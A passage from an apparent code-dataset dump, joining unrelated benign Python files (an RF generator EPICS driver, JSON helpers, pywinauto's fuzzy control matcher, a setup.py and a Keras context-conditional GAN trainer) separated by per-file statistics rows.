else: warn("Device offline")
return online
def query(self,command,count=None):
"""Send a command to the controller and return the reply"""
with self.__lock__: # multithread safe
for i in range(0,2):
try: reply = self.__query__(command,count=count)
except Exception,msg:
warn("query: %r: attempt %s/2: %s" % (command,i+1,msg))
reply = ""
if reply: return reply
self.init_communications()
return reply
def __query__(self,command,count=None):
"""Send a command to the controller and return the reply"""
from time import time
from sleep import sleep
sleep(self.last_reply_time + self.wait_time - time())
self.write(command)
reply = self.read(count=count)
self.last_reply_time = time()
return reply
def write(self,command):
"""Send a command to the controller"""
if self.port is not None:
self.port.write(command)
debug("%s: Sent %r" % (self.port.name,command))
def read(self,count=None,port=None):
"""Read a reply from the controller,
count: from non-terminated replies: number of bytes expected
If count is None, a newline or carriage return is expected to
terminate the reply"""
##debug("read count=%r,port=%r" % (count,port))
if port is None: port = self.port
if port is not None:
port.timeout = self.timeout
if count:
#print("in wait:" + str(self.port.inWaiting()))
debug("Trying to read %r bytes from %s..." % (count,port.name))
reply = port.read(count)
else:
debug("Expecting newline terminated reply from %s..." % (port.name))
reply = port.readline()
debug("%s: Read %r" % (port.name,reply))
else: reply = ""
return reply
def init_communications(self):
"""To do before communncating with the controller"""
from os.path import exists
from serial import Serial
if self.port is not None:
try:
info("Checking whether device is still responsive...")
self.port.write(self.id_query)
debug("%s: Sent %r" % (self.port.name,self.id_query))
reply = self.read(count=self.id_reply_length)
if not self.id_reply_valid(reply):
debug("%s: %r: invalid reply %r" % (self.port.name,self.id_query,reply))
info("%s: lost connection" % self.port.name)
self.port = None
else: info("Device is still responsive.")
except Exception,msg:
debug("%s: %s" % (Exception,msg))
self.port = None
if self.port is None:
port_basenames = ["COM"] if not exists("/dev") \
else ["/dev/tty.usbserial","/dev/ttyUSB"]
for i in range(-1,50):
for port_basename in port_basenames:
port_name = port_basename+("%d" % i if i>=0 else "")
##debug("Trying port %s..." % port_name)
try:
port = Serial(port_name,baudrate=self.baudrate)
port.write(self.id_query)
debug("%s: Sent %r" % (port.name,self.id_query))
reply = self.read(count=self.id_reply_length,port=port)
if self.id_reply_valid(reply):
self.port = port
info("Discovered device at %s based on reply %r" % (self.port.name,reply))
break
except Exception,msg: debug("%s: %s" % (Exception,msg))
if self.port is not None: break
def get_RF_on(self):
"""Is radiofrequency output enabled?"""
debug("Reading radiofrequency output state")
reply = self.query("GO") # ' RF OFF\r\n'
value = "RF ON" in reply
if not "RF " in reply:
warn("Reading radiofrequency output state unreadable")
from numpy import nan
value = nan
return value
def set_RF_on(self,value):
if value != self.RF_on: self.query("O",count=1)
RF_on = property(get_RF_on,set_RF_on)
VAL = RF_on
Ramsey_RF_driver = RamseyRFDriver()
class RamseyRF_IOC(object):
name = "Ramsey_RF_IOC"
from persistent_property import persistent_property
prefix = persistent_property("prefix","NIH:RF")
SCAN = persistent_property("SCAN",1.0)
running = False
def get_EPICS_enabled(self):
return self.running
def set_EPICS_enabled(self,value):
from thread import start_new_thread
if value:
if not self.running: start_new_thread(self.run,())
else: self.running = False
EPICS_enabled = property(get_EPICS_enabled,set_EPICS_enabled)
def run(self):
"""Run EPICS IOC"""
from CAServer import casput,casmonitor,casdel
from numpy import isfinite,nan
from time import time
from sleep import sleep
self.running = True
casput(self.prefix+".SCAN",self.SCAN)
casput(self.prefix+".DESC","State")
casput(self.prefix+".EGU","")
# Monitor client-writable PVs.
casmonitor(self.prefix+".SCAN",callback=self.monitor)
casmonitor(self.prefix+".VAL",callback=self.monitor)
was_online = False
while self.running:
if self.SCAN > 0 and isfinite(self.SCAN):
SCAN = self.SCAN
online = Ramsey_RF_driver.online
if online:
if online and not was_online:
info("Reading configuration...")
casput(self.prefix+".COMM",Ramsey_RF_driver.COMM)
casput(self.prefix+".SCANT",nan)
t = time()
casput(self.prefix+".VAL",float(Ramsey_RF_driver.VAL))
sleep(t+1.0*SCAN-time())
casput(self.prefix+".SCANT",time()-t) # post actual scan time for diagnostics
else:
casput(self.prefix+".VAL",nan)
sleep(SCAN)
was_online = online
else:
casput(self.prefix+".SCANT",nan)
sleep(0.1)
casdel(self.prefix)
def monitor(self,PV_name,value,char_value):
"""Process PV change requests"""
from CAServer import casput
info("%s = %r" % (PV_name,value))
if PV_name == self.prefix+".SCAN":
self.SCAN = float(value)
casput(self.prefix+".SCAN",self.SCAN)
if PV_name == self.prefix+".VAL":
Ramsey_RF_driver.VAL = float(value)
casput(self.prefix+".VAL",float(Ramsey_RF_driver.VAL))
Ramsey_RF_IOC = RamseyRF_IOC()
def run_IOC():
"""Serve the Ensemble IPAQ up on the network as EPICS IOC"""
import logging
from tempfile import gettempdir
logfile = gettempdir()+"/Ramsey_RF.log"
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s %(levelname)s: %(message)s",
filename=logfile,
)
Ramsey_RF_IOC.run()
def alias(name):
"""Make property given by name be known under a different name"""
def get(self): return getattr(self,name)
def set(self,value): setattr(self,name,value)
return property(get,set)
from EPICS_motor import EPICS_motor
class RamseyRF(EPICS_motor):
"""Thermoelectric water cooler"""
command_value = alias("VAL") # EPICS_motor.command_value not changable
port_name = alias("COMM")
prefix = alias("__prefix__") # EPICS_motor.prefix not changable
RF_on = alias("VAL") # for backward compatbility
Ramsey_RF_generator = RamseyRF(prefix="NIH:RF",name="Ramsey_RF")
def binstr(n):
"""binary number representation of n"""
s = ""
for i in range(31,-1,-1):
if (n >> i) & 1: s += "1"
elif s != "": s += "0"
return s
if __name__ == "__main__": # for testing
from sys import argv
if "run_IOC" in argv: run_IOC()
from pdb import pm
import logging
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s %(levelname)s: %(message)s")
self = Ramsey_RF_driver # for debugging
print('Ramsey_RF_driver.init_communications()')
print("Ramsey_RF_driver.port_name")
print("Ramsey_RF_driver.RF_on")
print("Ramsey_RF_IOC.run()")
print("run_IOC()")
| 36.089041 | 101 | 0.584836 | 8,235 | 0.781458 | 0 | 0 | 455 | 0.043177 | 0 | 0 | 3,085 | 0.29275 |
cde603f7c8844ec9a35ff25bb6a1c13b5f4bbf79 | 819 | py | Python | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | [
"MIT"
]
| null | null | null | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | [
"MIT"
]
| null | null | null | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | [
"MIT"
]
| null | null | null | import json
def save_json(dict_, json_filepath):
''' [Example] Write JSON '''
'''
dict_ = {"0":{"title":"test-A", "is-available": False, "link":"https://www.AAA.XXX..."},
"1":{"title":"test-B", "is-available": True, "link":"https://www.BBB.XXX..."}}
with open("dict_.txt", 'w') as output_file:
json.dump(dict_, output_file)
'''
with open(json_filepath, 'w') as output_file:
json.dump(dict_, output_file)
def load_json(json_filepath):
''' [Example] Read JSON '''
'''
with open("dict_.txt", 'r') as json_file:
dict_ = json.load(json_file)
print(dict_)
print(type(dict_))
'''
with open(json_filepath, 'r') as json_file:
dict_ = json.load(json_file)
#print(dict_)
#print(type(dict_))
return dict_ | 31.5 | 92 | 0.570208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 517 | 0.631258 |
cde6ca9c0b5b99aea51fe8a0efe3ed98163008e0 | 17,570 | py | Python | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | [
"MIT",
"Unlicense"
]
| 191 | 2015-01-02T12:17:07.000Z | 2021-05-26T09:26:05.000Z | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | [
"MIT",
"Unlicense"
]
| 48 | 2015-01-14T00:57:36.000Z | 2021-04-06T21:45:42.000Z | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | [
"MIT",
"Unlicense"
]
| 36 | 2015-01-14T18:54:25.000Z | 2021-07-18T10:54:42.000Z | # GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
"Module to find the closest match of a string in a list"
__revision__ = "$Revision: 679 $"
import re
import difflib
from . import fuzzydict
#import ctypes
#import ldistance
#levenshtein_distance = ctypes.cdll.levenshtein.levenshtein_distance
#levenshtein_distance = ldistance.distance
# need to use sets.Set for python 2.3 compatability
# but 2.6 raises a deprecation warning about sets module
try:
set
except NameError:
import sets
set = sets.Set
find_best_control_match_cutoff = .6
#====================================================================
class MatchError(IndexError):
"A suitable match could not be found"
def __init__(self, items = None, tofind = ''):
"Init the parent with the message"
self.tofind = tofind
self.items = items
if self.items is None:
self.items = []
IndexError.__init__(self,
"Could not find '%s' in '%s'"% (tofind, self.items))
_cache = {}
# given a list of texts return the match score for each
# and the best score and text with best score
#====================================================================
def _get_match_ratios(texts, match_against):
"Get the match ratio of how each item in texts compared to match_against"
# now time to figre out the matching
ratio_calc = difflib.SequenceMatcher()
ratio_calc.set_seq1(match_against)
ratios = {}
best_ratio = 0
best_text = ''
global cache
for text in texts:
if 0:
pass
if (text, match_against) in _cache:
ratios[text] = _cache[(text, match_against)]
elif(match_against, text) in _cache:
ratios[text] = _cache[(match_against, text)]
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(match_against), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text] = ratio
# calculate ratio and store it
ratios[text] = ratio_calc.ratio()
_cache[(match_against, text)] = ratios[text]
# if this is the best so far then update best stats
if ratios[text] > best_ratio:
best_ratio = ratios[text]
best_text = text
return ratios, best_ratio, best_text
#====================================================================
def find_best_match(search_text, item_texts, items, limit_ratio = .5):
"""Return the item that best matches the search_text
* **search_text** The text to search for
* **item_texts** The list of texts to search through
* **items** The list of items corresponding (1 to 1)
to the list of texts to search through.
* **limit_ratio** How well the text has to match the best match.
If the best match matches lower then this then it is not
considered a match and a MatchError is raised, (default = .5)
"""
search_text = _cut_at_tab(search_text)
text_item_map = UniqueDict()
# Clean each item, make it unique and map to
# to the item index
for text, item in zip(item_texts, items):
text_item_map[_cut_at_tab(text)] = item
ratios, best_ratio, best_text = \
_get_match_ratios(list(text_item_map.keys()), search_text)
if best_ratio < limit_ratio:
raise MatchError(items = list(text_item_map.keys()), tofind = search_text)
return text_item_map[best_text]
#====================================================================
_after_tab = re.compile(r"\t.*", re.UNICODE)
_non_word_chars = re.compile(r"\W", re.UNICODE)
def _cut_at_tab(text):
"Clean out non characters from the string and return it"
# remove anything after the first tab
return _after_tab.sub("", text)
def _clean_non_chars(text):
"Remove non word characters"
# should this also remove everything after the first tab?
# remove non alphanumeric characters
return _non_word_chars.sub("", text)
def IsAboveOrToLeft(ref_control, other_ctrl):
"Return true if the other_ctrl is above or to the left of ref_control"
text_r = other_ctrl.Rectangle()
ctrl_r = ref_control.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
return False
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
return False
# text control top left corner is below control
# top left corner - so not to the above or left :)
if text_r.top >= ctrl_r.top and text_r.left >= ctrl_r.left:
return False
return True
#====================================================================
distance_cuttoff = 999
def GetNonTextControlName(ctrl, controls):
"""return the name for this control by finding the closest
text control above and to its left"""
names = []
ctrl_index = controls.index(ctrl)
if ctrl_index != 0:
prev_ctrl = controls[ctrl_index-1]
if prev_ctrl.FriendlyClassName() == "Static" and \
prev_ctrl.IsVisible() and prev_ctrl.WindowText() and \
IsAboveOrToLeft(ctrl, prev_ctrl):
names.append(
prev_ctrl.WindowText() +
ctrl.FriendlyClassName())
# get the visible text controls so that we can get
# the closest text if the control has no text
text_ctrls = [ctrl_ for ctrl_ in controls
if ctrl_.IsVisible() and ctrl_.WindowText() and ctrl_.can_be_label]
best_name = ''
closest = distance_cuttoff
# now for each of the visible text controls
for text_ctrl in text_ctrls:
# get aliases to the control rectangles
text_r = text_ctrl.Rectangle()
ctrl_r = ctrl.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
continue
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
continue
# calculate the distance between the controls
# at first I just calculated the distance from the top let
# corner of one control to the top left corner of the other control
# but this was not best, so as a text control should either be above
# or to the left of the control I get the distance between
# the top left of the non text control against the
# Top-Right of the text control (text control to the left)
# Bottom-Left of the text control (text control above)
# then I get the min of these two
# We do not actually need to calculate the difference here as we
# only need a comparative number. As long as we find the closest one
# the actual distance is not all that important to us.
# this reduced the unit tests run on my by about 1 second
# (from 61 ->60 s)
# (x^2 + y^2)^.5
#distance = (
# (text_r.left - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.bottom - ctrl_r.top) ** 2) \
# ** .5 # ^.5
#distance2 = (
# (text_r.right - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.top - ctrl_r.top) ** 2) \
# ** .5 # ^.5
distance = abs(text_r.left - ctrl_r.left) + abs(text_r.bottom - ctrl_r.top)
distance2 = abs(text_r.right - ctrl_r.left) + abs(text_r.top - ctrl_r.top)
distance = min(distance, distance2)
# if this distance was closer then the last one
if distance < closest:
closest = distance
best_name = text_ctrl.WindowText() + ctrl.FriendlyClassName()
names.append(best_name)
return names
#====================================================================
def get_control_names(control, allcontrols):
"Returns a list of names for this control"
names = []
# if it has a reference control - then use that
#if hasattr(control, 'ref') and control.ref:
# control = control.ref
# Add the control based on it's friendly class name
names.append(control.FriendlyClassName())
# if it has some character text then add it base on that
# and based on that with friendly class name appended
cleaned = control.WindowText()
# Todo - I don't like the hardcoded classnames here!
if cleaned and control.has_title:
names.append(cleaned)
names.append(cleaned + control.FriendlyClassName())
# it didn't have visible text
else:
# so find the text of the nearest text visible control
non_text_names = GetNonTextControlName(control, allcontrols)
# and if one was found - add it
if non_text_names:
names.extend(non_text_names)
# return the names - and make sure there are no duplicates
return set(names)
#====================================================================
class UniqueDict(dict):
"A dictionary subclass that handles making it's keys unique"
def __setitem__(self, text, item):
"Set an item of the dictionary"
# this text is already in the map
# so we need to make it unique
if text in self:
# find next unique text after text1
unique_text = text
counter = 2
while unique_text in self:
unique_text = text + str(counter)
counter += 1
# now we also need to make sure the original item
# is under text0 and text1 also!
if text + '0' not in self:
dict.__setitem__(self, text+'0', self[text])
dict.__setitem__(self, text+'1', self[text])
# now that we don't need original 'text' anymore
# replace it with the uniq text
text = unique_text
# add our current item
dict.__setitem__(self, text, item)
def FindBestMatches(
self,
search_text,
clean = False,
ignore_case = False):
"""Return the best matches for search_text in the items
* **search_text** the text to look for
* **clean** whether to clean non text characters out of the strings
* **ignore_case** compare strings case insensitively
"""
# now time to figure out the matching
ratio_calc = difflib.SequenceMatcher()
if ignore_case:
search_text = search_text.lower()
ratio_calc.set_seq1(search_text)
ratios = {}
best_ratio = 0
best_texts = []
ratio_offset = 1
if clean:
ratio_offset *= .9
if ignore_case:
ratio_offset *= .9
for text_ in self:
# make a copy of the text as we need the original later
text = text_
if clean:
text = _clean_non_chars(text)
if ignore_case:
text = text.lower()
# check if this item is in the cache - if yes, then retrieve it
if (text, search_text) in _cache:
ratios[text_] = _cache[(text, search_text)]
elif(search_text, text) in _cache:
ratios[text_] = _cache[(search_text, text)]
# not in the cache - calculate it and add it to the cache
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
# if a very quick check reveals that this is not going
# to match then
ratio = ratio_calc.real_quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.ratio() * ratio_offset
# save the match we got and store it in the cache
ratios[text_] = ratio
_cache[(text, search_text)] = ratio
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(search_text), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text_] = ratio
#print "%5s" %("%0.2f"% ratio), search_text, `text`
# if this is the best so far then update best stats
if ratios[text_] > best_ratio and \
ratios[text_] >= find_best_control_match_cutoff:
best_ratio = ratios[text_]
best_texts = [text_]
elif ratios[text_] == best_ratio:
best_texts.append(text_)
#best_ratio *= ratio_offset
return best_ratio, best_texts
#====================================================================
def build_unique_dict(controls):
"""Build the disambiguated list of controls
Separated out to a different function so that we can get
the control identifiers for printing.
"""
name_control_map = UniqueDict()
# collect all the possible names for all controls
# and build a list of them
for ctrl in controls:
ctrl_names = get_control_names(ctrl, controls)
# for each of the names
for name in ctrl_names:
name_control_map[name] = ctrl
return name_control_map
#====================================================================
def find_best_control_matches(search_text, controls):
"""Returns the control that is the the best match to search_text
This is slightly differnt from find_best_match in that it builds
up the list of text items to search through using information
from each control. So for example for there is an OK, Button
then the following are all added to the search list:
"OK", "Button", "OKButton"
But if there is a ListView (which do not have visible 'text')
then it will just add "ListView".
"""
name_control_map = build_unique_dict(controls)
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl, controls)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
search_text = str(search_text)
best_ratio, best_texts = name_control_map.FindBestMatches(search_text)
best_ratio_ci, best_texts_ci = \
name_control_map.FindBestMatches(search_text, ignore_case = True)
best_ratio_clean, best_texts_clean = \
name_control_map.FindBestMatches(search_text, clean = True)
best_ratio_clean_ci, best_texts_clean_ci = \
name_control_map.FindBestMatches(
search_text, clean = True, ignore_case = True)
if best_ratio_ci > best_ratio:
best_ratio = best_ratio_ci
best_texts = best_texts_ci
if best_ratio_clean > best_ratio:
best_ratio = best_ratio_clean
best_texts = best_texts_clean
if best_ratio_clean_ci > best_ratio:
best_ratio = best_ratio_clean_ci
best_texts = best_texts_clean_ci
if best_ratio < find_best_control_match_cutoff:
raise MatchError(items = list(name_control_map.keys()), tofind = search_text)
return [name_control_map[best_text] for best_text in best_texts]
#
#def GetControlMatchRatio(text, ctrl):
# # get the texts for the control
# ctrl_names = get_control_names(ctrl)
#
# #get the best match for these
# matcher = UniqueDict()
# for name in ctrl_names:
# matcher[name] = ctrl
#
# best_ratio, unused = matcher.FindBestMatches(text)
#
# return best_ratio
#
#
#
#def get_controls_ratios(search_text, controls):
# name_control_map = UniqueDict()
#
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
#
# match_ratios, best_ratio, best_text = \
# _get_match_ratios(name_control_map.keys(), search_text)
#
# return match_ratios, best_ratio, best_text,
| 32.657993 | 86 | 0.594878 | 4,299 | 0.244678 | 0 | 0 | 0 | 0 | 0 | 0 | 8,676 | 0.493796 |
cde9443d5f9dce44149feca0d10e665a2fbcf090 | 1,074 | py | Python | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | [
"MIT"
]
| 11 | 2018-07-09T07:08:16.000Z | 2018-07-13T14:05:46.000Z | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | [
"MIT"
]
| 3 | 2020-03-24T17:37:47.000Z | 2021-02-02T22:18:59.000Z | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | [
"MIT"
]
| null | null | null | from setuptools import setup, find_packages
exclude_dirs = ['ez_setup', 'examples', 'tests', 'venv']
# Runtime requirements
reqs = [
'requests',
'six',
'future',
'aenum'
]
# Requirements for testing
test_reqs = ['pytest', 'hypothesis', 'requests_mock']
# Requirements for setup
setup_reqs = ['flake8', 'pep8', 'pytest-runner']
setup(
name='fabricate-it',
version='1.1.0',
author='Brett Levenson',
author_email='[email protected]',
description='A library that makes creating API clients simple and declarative',
url='https://github.com/boichee/fabricator',
packages=find_packages(exclude=exclude_dirs),
install_requires=reqs,
tests_require=test_reqs,
setup_requires=setup_reqs,
classifiers=[
'Development Status :: 4 - Beta',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Topic :: Software Development',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Intended Audience :: Developers'
]
)
| 26.85 | 83 | 0.650838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 601 | 0.55959 |
cde9a03010ce87292ba1da645b7d397d96cc724e | 115 | py | Python | aitoolbox/cloud/__init__.py | mv1388/AIToolbox | c64ac4810a02d230ce471d86b758e82ea232a7e7 | [
"MIT"
]
| 3 | 2019-10-12T12:24:09.000Z | 2020-08-02T02:42:43.000Z | aitoolbox/cloud/__init__.py | mv1388/aitoolbox | 1060435e6cbdfd19abcb726c4080b663536b7467 | [
"MIT"
]
| 3 | 2020-04-10T14:07:07.000Z | 2020-04-22T19:04:38.000Z | aitoolbox/cloud/__init__.py | mv1388/aitoolbox | 1060435e6cbdfd19abcb726c4080b663536b7467 | [
"MIT"
]
| null | null | null | s3_available_options = ['s3', 'aws_s3', 'aws']
gcs_available_options = ['gcs', 'google_storage', 'google storage']
| 38.333333 | 67 | 0.713043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.469565 |
cde9dfcf27b3e92945a09440ebd5cd1eb09e8452 | 12,607 | py | Python | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | [
"MIT"
]
| null | null | null | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | [
"MIT"
]
| null | null | null | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | [
"MIT"
]
| null | null | null | from __future__ import print_function, division
if __name__=='__main__':
from cc_weights import Weight_model
else:
from . import Weight_model
from keras.models import load_model
import keras.backend as K
import plotload
import sys
from selector import Selector
#from masker import mask_from_template,mask_randomly_square,mask_green_corner,combine_imgs_with_mask
import masker as ms
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import cutter
import masker
class CCgan():
def __init__(self,img_cols,img_rows):
"""
Initializes the autoencoder.
"""
self.set_training_info()
globals().update(self.info)
self.threshold=threshold
self.img_cols = img_cols # Original is ~576
self.img_rows = img_rows # Original is ~720
self.channels = 3 # RGB
self.img_shape=(self.img_cols,self.img_rows,self.channels)
if not mask:
dummy=plotload.load_polyp_batch(self.img_shape,20,data_type='med/stool-inclusions',crop=False)
self.dims =cutter.find_square_coords(dummy)
self.combined=None
self.discriminator=None
self.generator=None
self.pretrained=False
def load_model(self):
"""
loads a model to the object instead of creating one.
:param adress: string of adress to the file of type h5.
"""
if self.combined!=None:
print("Warning: overriding a loaded model")
self.generator=load_model(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
self.discriminator=load_model(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
self.combined=load_model(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
def load_model_weights(self):
if self.combined==None:
print("Error: no model in object")
else:
try:
self.combined.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com.h5")
self.discriminator.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis.h5")
self.generator.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen.h5")
self.pretrained=True
except e:
print("Error: weights could not be loaded")
print(e)
def build_model(self):
"""
builds a model to the object instead of loading one.
Uses AE_weights.py as model
"""
if self.combined!=None:
print("Warning: overriding a loaded model")
wm=Weight_model(self.img_cols,self.img_rows)
self.discriminator,self.generator,self.combined=wm.build_model()
def set_training_info(self):
self.info={}
import sys
try:
if len(sys.argv)==1:
choise=2
else:
choise=int(input("press 1 for last run or 2 for info.txt "))
except:
choise=False
if choise==1:
self.info=np.load("temp_info.npy").item()
return
elif choise==2:
with open("info.txt") as f:
for line in f:
(key, val) = line.split()
try:
self.info[key] = int(val)
except:
self.info[key] = float(val)
np.save("temp_info.npy", self.info)
return
else:
self.info["mask"]=int(input("Mask [1] or corner [0]? "))
if self.info['mask']==1:
tmp=input("Mask adress? (default: /masks) ")
self.info["mask_folder"]=tmp if isinstance(tmp, str) else "/masks"
self.info["epochs"]=int(input("Number of epochs? "))
self.info["batch_size"]=int(input("Batch size? "))
self.info["save_interval"]=int(input("save interval? "))
np.save("temp_info.npy", self.info)
def train_model(self):
def t(m,bol):
for layer in m.layers:
layer.trainable=bol
if self.info==None:
print("Warning no info found, prompting for info")
self.set_training_info()
globals().update(self.info)
if self.combined==None:
print("Error: no model loaded")
return
if self.pretrained==True:
print("Warning: model has pretrained weights")
half_batch = batch_size
for epoch in tqdm(range(epochs)):
X_train = plotload.load_polyp_batch(self.img_shape, batch_size, data_type='med/none',crop=False)
if corner:
masked_imgs, missing, mask = ms.mask_green_corner(X_train)
m=np.zeros(shape=X_train.shape)
for i in range(X_train.shape[0]):
m[i,mask[0]:mask[1],mask[2]:mask[3]]=missing[i]
missing=m
else:
masked_imgs, missing, mask = ms.mask_from_template(X_train)
if soft:
valid = 0.2*np.random.random_sample((half_batch,1))+0.9
fake = 0.1*np.random.random_sample((half_batch,1))
else:
valid = np.ones((half_batch, 1))
fake = np.zeros((half_batch, 1))
# ---------------------
# Train Generator
# ---------------------
valid = np.ones((batch_size, 1))
# Train the generator
t(self.discriminator,False)
g_loss = self.combined.train_on_batch(masked_imgs, [X_train, valid])
t(self.discriminator,True)
# ---------------------
# Train discriminator
# ---------------------
gen_fake = self.generator.predict(masked_imgs)
gen_fake = ms.combine_imgs_with_mask(gen_fake, X_train, mask)
if epoch%120==0 and epoch!=0:
#small shakeup to get out of local minimas
fake, valid = valid , fake
# Train the discriminator
d_loss_real = self.discriminator.train_on_batch(X_train, valid)
d_loss_fake = self.discriminator.train_on_batch(gen_fake, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Plot the progress
print ("[D: %f G: %f, mse: %f]" % (d_loss[0], g_loss[0], g_loss[1]))
if g_loss[1]<self.threshold:
self.threshold=g_loss[1]
self.generator.save(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
self.discriminator.save(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
self.combined.save(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
self.combined.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com.h5")
self.discriminator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis.h5")
self.generator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen.h5")
if g_loss[1]<self.threshold:
self.threshold=g_loss[1]
self.generator.save(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
self.discriminator.save(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
self.combined.save(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
self.combined.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com_fin.h5")
self.discriminator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis_fin.h5")
self.generator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen_fin.h5")
def build_wrapper(self):
"""
Returns a func that works as a complete preprocsess tool
"""
if mask==1:
def ret(input_img,mask=None):
"""
Without a corner, a mask must be added
"""
if not cutter.is_green(input_img):
return input_img
if mask is None:
mask=plotload.load_single_template(input_img.shape,dest='med/green')
img=input_img.copy()
if len(img.shape)==3:
img=np.expand_dims(img, 0)
prediced=np.squeeze(self.generator.predict(img),0)
img=masker.combine_imgs_with_mask(prediced, img, mask)
return np.expand_dims(img,0)
else:
def ret(input_img):
if not cutter.is_green(input_img):
return input_img
img=input_img.copy()
if len(img.shape)==3:
img=np.expand_dims(img, 0)
y1,y2,x1,x2=self.dims
img, _, _ = ms.mask_green_corner(img)
prediced=np.squeeze(self.generator.predict(img),0)
img=np.squeeze(img,0)
img[y1:y2,x1:x2]=prediced[y1:y2,x1:x2]
return np.expand_dims(img,0)
return ret
def sample_images(self, epoch, imgs):
r, c = 3, 6
masked_imgs, missing_parts, m = mask_from_template(imgs)
gen_fake1 = self.generator.predict(missing_parts)
gen_fake = combine_imgs_with_mask(gen_fake1, imgs, m)
imgs = 0.5 * imgs + 0.5
masked_imgs = 0.5 * masked_imgs + 0.5
gen_fake = 0.5 * gen_fake + 0.5
gen_fake1 = 0.5 * gen_fake1 + 0.5
fig, axs = plt.subplots(r, c)
for i in range(c):
